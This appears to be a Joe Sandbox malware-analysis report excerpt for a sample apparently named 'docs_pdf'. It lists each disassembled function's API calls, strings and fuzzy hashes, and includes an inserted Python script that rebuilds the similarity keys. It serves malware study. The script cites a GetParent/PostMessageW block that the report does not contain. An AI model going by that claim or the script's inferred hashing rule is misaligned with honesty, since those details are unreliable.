                                    • Opcode ID: 30199e0620d7751aea0912c7ba1c27ad24948da3665c4c02b63e4f5cb9ee5da0
                                    • Instruction ID: 64dd17eb94e2e1764c65d8d5eed1a2ff289132445361aed4577373be5f8def45
                                    • Opcode Fuzzy Hash: 30199e0620d7751aea0912c7ba1c27ad24948da3665c4c02b63e4f5cb9ee5da0
                                    • Instruction Fuzzy Hash: 6F01BBB5640349BFE720ABA5EC4DF6B3BACEB89711F004411FA45DB195CA759C04DB21
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$_memset
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2862541840-625585964
                                    • Opcode ID: c53d59f03d3c9be675550533105fd4c9f46843580634c245c1406d7ab754e61e
                                    • Instruction ID: 3c49842b9d7f597035abb3180cac90bd0728bc236a60bd2c34745caf35ccafe7
                                    • Opcode Fuzzy Hash: c53d59f03d3c9be675550533105fd4c9f46843580634c245c1406d7ab754e61e
                                    • Instruction Fuzzy Hash: 2F91AE71A00239ABDF24DFA5C848FAEBBF8EF49718F008559F595AB241D7749904CFA0
                                    APIs
                                      • Part of subcall function 01007652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?,?,0100799D), ref: 0100766F
                                      • Part of subcall function 01007652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 0100768A
                                      • Part of subcall function 01007652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?,?), ref: 01007698
                                      • Part of subcall function 01007652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0100758C,80070057,?), ref: 010076A8
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01029B1B
                                    • _memset.LIBCMT ref: 01029B28
                                    • _memset.LIBCMT ref: 01029C6B
                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01029C97
                                    • CoTaskMemFree.OLE32(?), ref: 01029CA2
                                    Strings
                                    • NULL Pointer assignment, xrefs: 01029CF0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1300414916-2785691316
                                    • Opcode ID: 3d4e6b817f89919854a39fdadb5d6e370fcba7bf8b9b240c5ac028180c824a57
                                    • Instruction ID: c6b8b1af33ca36b7a091a83ffa6c5ae7f51588fc40501acde9cb5156556cc241
                                    • Opcode Fuzzy Hash: 3d4e6b817f89919854a39fdadb5d6e370fcba7bf8b9b240c5ac028180c824a57
                                    • Instruction Fuzzy Hash: 9D914871D00229EBDB10EFA5DC80ADEBBB9FF48710F20415AF559A7281DB359A44CFA0
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01037093
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 010370A7
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 010370C1
                                    • _wcscat.LIBCMT ref: 0103711C
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 01037133
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01037161
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
                                    • String ID: SysListView32
                                    • API String ID: 307300125-78025650
                                    • Opcode ID: 8bb2d7c180f12a35d2e9c682cba57c07afa1072c2205c638a7acaaa78f84245c
                                    • Instruction ID: 6f0ed668d0d832123791fb9db6d7cbece93f8077d2c431c7f133f5da449506a9
                                    • Opcode Fuzzy Hash: 8bb2d7c180f12a35d2e9c682cba57c07afa1072c2205c638a7acaaa78f84245c
                                    • Instruction Fuzzy Hash: A641A3B5A00309EFEB219F68CC85BEEB7EDEF48350F00046AF584E7192D67699849B50
                                    APIs
                                      • Part of subcall function 01013E91: CreateToolhelp32Snapshot.KERNEL32 ref: 01013EB6
                                      • Part of subcall function 01013E91: Process32FirstW.KERNEL32(00000000,?), ref: 01013EC4
                                      • Part of subcall function 01013E91: CloseHandle.KERNEL32(00000000), ref: 01013F8E
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0102ECB8
                                    • GetLastError.KERNEL32 ref: 0102ECCB
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0102ECFA
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0102ED77
                                    • GetLastError.KERNEL32(00000000), ref: 0102ED82
                                    • CloseHandle.KERNEL32(00000000), ref: 0102EDB7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 2533919879-2896544425
                                    • Opcode ID: d7ebfb6850be18fa05aa5bd816e17c8acd1f2238152604b91b69054c2b2336d6
                                    • Instruction ID: 244729af3364c64f2512ea43bc7ed4ec62d35c1f15720ca611220789b80f6c24
                                    • Opcode Fuzzy Hash: d7ebfb6850be18fa05aa5bd816e17c8acd1f2238152604b91b69054c2b2336d6
                                    • Instruction Fuzzy Hash: B741C1316442129FDB21EF18CC95FADB7A5AF41714F08805DF9869F2C2CBB9A804DF92
                                    APIs
                                    • LoadIconW.USER32(00000000,00007F03), ref: 010132C5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconLoad
                                    • String ID: blank$info$question$stop$warning
                                    • API String ID: 2457776203-404129466
                                    • Opcode ID: 0bb0a7d771fd26f8f5cd3b68ead95d51816ef570460ba51b4944a9926bf5d3d7
                                    • Instruction ID: 46f4ee7e6dfb27b8d978612f0c612fc2ff2e7826d48c8d56c9eababc9ceb4032
                                    • Opcode Fuzzy Hash: 0bb0a7d771fd26f8f5cd3b68ead95d51816ef570460ba51b4944a9926bf5d3d7
                                    • Instruction Fuzzy Hash: 71112B31749357BBE7017A59DC43DEEB7DCFF09270F10006AFA80AE282D67E5A4086A5
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0101454E
                                    • LoadStringW.USER32(00000000), ref: 01014555
                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0101456B
                                    • LoadStringW.USER32(00000000), ref: 01014572
                                    • _wprintf.LIBCMT ref: 01014598
                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 010145B6
                                    Strings
                                    • %s (%d) : ==> %s: %s %s, xrefs: 01014593
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: HandleLoadModuleString$Message_wprintf
                                    • String ID: %s (%d) : ==> %s: %s %s
                                    • API String ID: 3648134473-3128320259
                                    • Opcode ID: ef67aba8c33921f0e3001517b32feda1b592af7554e3a399749ab61a8a5e08e6
                                    • Instruction ID: 3c949541986e8f019fa35e733d313a75bc32a3f2601f6a52794b8b160c3f539d
                                    • Opcode Fuzzy Hash: ef67aba8c33921f0e3001517b32feda1b592af7554e3a399749ab61a8a5e08e6
                                    • Instruction Fuzzy Hash: 880186F2D00209BFE760A7A5DD89EFB776CE708301F000596BB85D2045EB799E858B72
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • GetSystemMetrics.USER32(0000000F), ref: 0103D78A
                                    • GetSystemMetrics.USER32(0000000F), ref: 0103D7AA
                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0103D9E5
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0103DA03
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0103DA24
                                    • ShowWindow.USER32(00000003,00000000), ref: 0103DA43
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0103DA68
                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0103DA8B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                    • String ID:
                                    • API String ID: 1211466189-0
                                    • Opcode ID: b79e9dcf75fec1ca2dacd20b569b20361e00756d463a83c15085908dec9f0220
                                    • Instruction ID: 6f2b0e56bba23e2908a31370d8f1339935efdfe90d0c7d8cf734c5ed005adf09
                                    • Opcode Fuzzy Hash: b79e9dcf75fec1ca2dacd20b569b20361e00756d463a83c15085908dec9f0220
                                    • Instruction Fuzzy Hash: 15B1CC71900216EBDF14CFA9C5857BD7BFABF84701F0880AAED889B289D735A950CB50
                                    APIs
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FEC417,00000004,00000000,00000000,00000000), ref: 00FB2ACF
                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FEC417,00000004,00000000,00000000,00000000,000000FF), ref: 00FB2B17
                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FEC417,00000004,00000000,00000000,00000000), ref: 00FEC46A
                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FEC417,00000004,00000000,00000000,00000000), ref: 00FEC4D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ShowWindow
                                    • String ID:
                                    • API String ID: 1268545403-0
                                    • Opcode ID: 63b116614cda66bd596ee7746c84ba78e980bc65fdacc6f41b97dc9bac193c40
                                    • Instruction ID: a2f243090cae5667603f9a3cc0ccbee4e9fbf87fd6eefe35ba30b12781d80c15
                                    • Opcode Fuzzy Hash: 63b116614cda66bd596ee7746c84ba78e980bc65fdacc6f41b97dc9bac193c40
                                    • Instruction Fuzzy Hash: 37410E31E046C09AD7B5AB2BCD98BF77B99BB85320F24840DF08786594C67DA842FF51
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 0101737F
                                      • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
                                      • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 010173B6
                                    • EnterCriticalSection.KERNEL32(?), ref: 010173D2
                                    • _memmove.LIBCMT ref: 01017420
                                    • _memmove.LIBCMT ref: 0101743D
                                    • LeaveCriticalSection.KERNEL32(?), ref: 0101744C
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 01017461
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 01017480
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 256516436-0
                                    • Opcode ID: 0e9b4fd47242c77454465a791d67e071c2c95579014e09be3562b8c8183abcac
                                    • Instruction ID: 455ba3d775b2a9fe0b5d5a36282f731fb16a23ceed677b050f1156215fdd07f7
                                    • Opcode Fuzzy Hash: 0e9b4fd47242c77454465a791d67e071c2c95579014e09be3562b8c8183abcac
                                    • Instruction Fuzzy Hash: A8318131900205EBCF10EF54DC85AAF7BB8FF45710F1441A6F944AB24ADB799A14DBA1
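The "API ID" under each function's Similarity entry is the key Joe Sandbox uses to match functions across samples, and it can be rebuilt from the function's API list alone. The script below is an added example, not Joe Sandbox's own code: the rule it implements is inferred from the keys on this page (split every API name at each capital letter, drop tokens shorter than four characters, count each token over the listed calls including the "Part of subcall function" entries, group tokens by descending count, sort each group in ASCII order and join the groups with "$"). The two inputs are copied from the ReadFile/InterlockedExchange block above and the GetParent/PostMessageW block further down; the numeric "API String ID" is a hash the page gives no way to reproduce, so it is not attempted.

```python
import re
from collections import Counter

# Constructed input: two API listings copied verbatim from the report.
SAMPLE_READFILE = """\
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 0101737F
  • Part of subcall function 00FD0FF6: std::exception::exception.LIBCMT ref: 00FD102C
  • Part of subcall function 00FD0FF6: __CxxThrowException@8.LIBCMT ref: 00FD1041
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 010173B6
• EnterCriticalSection.KERNEL32(?), ref: 010173D2
• _memmove.LIBCMT ref: 01017420
• _memmove.LIBCMT ref: 0101743D
• LeaveCriticalSection.KERNEL32(?), ref: 0101744C
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 01017461
• InterlockedExchange.KERNEL32(?,000001F6), ref: 01017480
"""

SAMPLE_KEYBOARD = """\
APIs
• GetParent.USER32(?), ref: 0101149C
• GetKeyboardState.USER32(?), ref: 010114B1
• SetKeyboardState.USER32(?), ref: 01011512
• PostMessageW.USER32(?,00000101,00000010,?), ref: 01011540
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0101155F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 010115A5
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 010115C8
"""

# One "• Name.MODULE(args), ref: ADDR" line, optionally prefixed with the
# "Part of subcall function ADDR:" marker the report uses for callee APIs.
# LIBCMT entries carry no argument list, so the "(args)" part is optional.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[^\s(]+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


def parse_apis(block):
    """Return one dict per API line; header lines such as "APIs" are skipped."""
    calls = []
    for line in block.splitlines():
        m = API_LINE.match(line)
        if m is None:
            continue
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": [] if m.group("args") is None else m.group("args").split(","),
            "ref": int(m.group("ref"), 16),
            "subcall": None if m.group("sub") is None else int(m.group("sub"), 16),
        })
    return calls


# A token is the run of characters starting at each capital letter, or the
# leading run of a name with no initial capital ("_memmove", "std::...").
TOKEN = re.compile(r"^[^A-Z]+|[A-Z][^A-Z]*")
MIN_TOKEN_LEN = 4  # inferred: "Get", "Dlg", "Cxx" and the "W" suffix never reach the key


def tokens(name):
    """Split an API name into its CamelCase parts and drop the short ones."""
    return [t for t in TOKEN.findall(name) if len(t) >= MIN_TOKEN_LEN]


def api_id(calls):
    """Rebuild the "API ID" key: tokens grouped by descending occurrence count
    (subcall entries included), ASCII-sorted within a group, groups joined with "$"."""
    counts = Counter(t for c in calls for t in tokens(c["name"]))
    groups = []
    for n in sorted(set(counts.values()), reverse=True):
        groups.append("".join(sorted(t for t, k in counts.items() if k == n)))
    return "$".join(groups)


def api_id_of_block(block):
    """Convenience wrapper: parse a pasted function block and return its key."""
    return api_id(parse_apis(block))


if __name__ == "__main__":
    for block in (SAMPLE_READFILE, SAMPLE_KEYBOARD):
        print(api_id_of_block(block))
```

Because the key depends only on which API names occur and how often, two functions with different code bytes but the same call profile share it, which is what makes it useful for pivoting between reports of the same AutoIt runtime; the fuzzy hashes under "Instruction Fuzzy Hash" are the finer-grained comparison when the API ID alone matches too broadly.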
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 0103645A
                                    • GetDC.USER32(00000000), ref: 01036462
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0103646D
                                    • ReleaseDC.USER32(00000000,00000000), ref: 01036479
                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 010364B5
                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 010364C6
                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01039299,?,?,000000FF,00000000,?,000000FF,?), ref: 01036500
                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01036520
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                    • String ID:
                                    • API String ID: 3864802216-0
                                    • Opcode ID: a7c2f28201f2a87ca6746ac372048346264ca39fbde3a3126cacf3ab9e44babc
                                    • Instruction ID: 069e2fa0bfdb6d143095a06e8e24ef83b9321032bb7f802c27489a7c92371d7d
                                    • Opcode Fuzzy Hash: a7c2f28201f2a87ca6746ac372048346264ca39fbde3a3126cacf3ab9e44babc
                                    • Instruction Fuzzy Hash: CA319F72601210BFEB218F64CC8AFEA3FADEF49761F040065FE48DA195C77A9941CB61
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 76238957f3c9a7b5f5dd4c6b80aa9ab79382e7b6b3ce177ddec32782d24a0586
                                    • Instruction ID: 66ee51b2b8bbe1091b76471fc9190f5655f8839002a7cb7bc729546e2c5fb2a8
                                    • Opcode Fuzzy Hash: 76238957f3c9a7b5f5dd4c6b80aa9ab79382e7b6b3ce177ddec32782d24a0586
                                    • Instruction Fuzzy Hash: 002107A170020577F252E9259E82FAF37DEEF12294F0801A5FE859A3C3E765DD11C1A5
                                    APIs
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                      • Part of subcall function 00FCFEC6: _wcscpy.LIBCMT ref: 00FCFEE9
                                    • _wcstok.LIBCMT ref: 0101EEFF
                                    • _wcscpy.LIBCMT ref: 0101EF8E
                                    • _memset.LIBCMT ref: 0101EFC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    • Opcode ID: cdb3179b8913cc90c47c3b5127fcd6881cee269915e4ac82babd65523f08780f
                                    • Instruction ID: 5c57ed23f40e19ead98bf0868dc794d27303cea7f08f4060f26474206c1bf103
                                    • Opcode Fuzzy Hash: cdb3179b8913cc90c47c3b5127fcd6881cee269915e4ac82babd65523f08780f
                                    • Instruction Fuzzy Hash: 04C19D715083019FC765EF24C881A9EBBE4BF85310F04496DF9999B2A2DB78E945CF82
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6df62f146d2ff9ed5aefbb5afb837cce90b80ce74594034ac1fed3b946bf1683
                                    • Instruction ID: 07628c1364ec7e31280c05718571b01b1d6f42d2db7dc1a2bcf3a572211edf76
                                    • Opcode Fuzzy Hash: 6df62f146d2ff9ed5aefbb5afb837cce90b80ce74594034ac1fed3b946bf1683
                                    • Instruction Fuzzy Hash: 15716B31900109EFCB14CF99CC98AEFBB79FF86320F648149F915AA251C734AA51DFA0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 883cc4316777823e72a2dc9c8834f72784ffc1df8fd27a8be76824603089109a
                                    • Instruction ID: 265358342f2fad17273d3258a49df39d313b493e740aeb4bf09d998aad149153
                                    • Opcode Fuzzy Hash: 883cc4316777823e72a2dc9c8834f72784ffc1df8fd27a8be76824603089109a
